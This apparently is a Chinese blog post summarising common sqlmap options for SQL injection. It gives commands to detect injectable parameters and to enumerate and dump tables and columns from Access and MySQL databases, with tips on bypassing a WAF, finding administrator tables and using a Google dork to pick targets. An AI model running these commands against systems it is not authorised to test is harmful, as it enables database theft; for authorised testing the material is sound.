SqlMap常用参数(一)

sqlmap可谓是利用sql注入的神器了,sqlmap的参数很多,接下介绍几种常见的参数。

一。注入access数据库常用的参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据

二。注入MySQL数据库常用参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --current-db  //查看网站当前数据库

sqlmap.py -u "url" --is-dba  //查看当前用户权限

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据

三。一些常用参数集合

-h //查看帮助选项

--dbs //查看网站所有数据库

--users //查看所有数据库的用户

--count  //统计条数 (该条命令可用在爆表名的时候,便于查看哪个是管理员的表)

--level //测试等级(1-5)默认是1,cookie注入是2,http头注入是3

--dbms=mysql/oracle/mssql 指定数据库(这样既可以节省时间,在某些时候也可以绕过waf)

  sqlmap.py -u “url”--batch --exclude-sysdbs //batch是使用sqlmap默认选项,不用按回车;exclude-sysdbs是排除系统自带的数据库

显示调式信息
-v 显示调用信息有7个级别
0, 只显示python错误以及严重的信息
1,同时显示基本信息和警告信息。
2,同时显示debug信息
3,同时显示注入的payload
4,同时显示http请求
5,同时显示http响应头
6,同时显示http响应页面
--risk    //风险等级,共有四个等级,1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的sql注入测试
-m       //从文本中获取多个目标,文件中保存url格式,sqlmap会一个一个测试  sqlmap.py -m 1.txt
-r        //获取http请求注入,sqlmap可以从一个文本文件中获取http请求,这样就可以跳过设置一些其他参数,在存在注入的http请求头加*。
利用的场景:post,搜索注入,http头注入,登陆后的注入(在登录后存在注入点,因为只有在登录后才有cookie)
-g       //处理google搜索结果, sqlmap可以测试注入google的搜索结果中的get参数(前100个请求)       sqlmap.py -g "inurl:php?id="
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值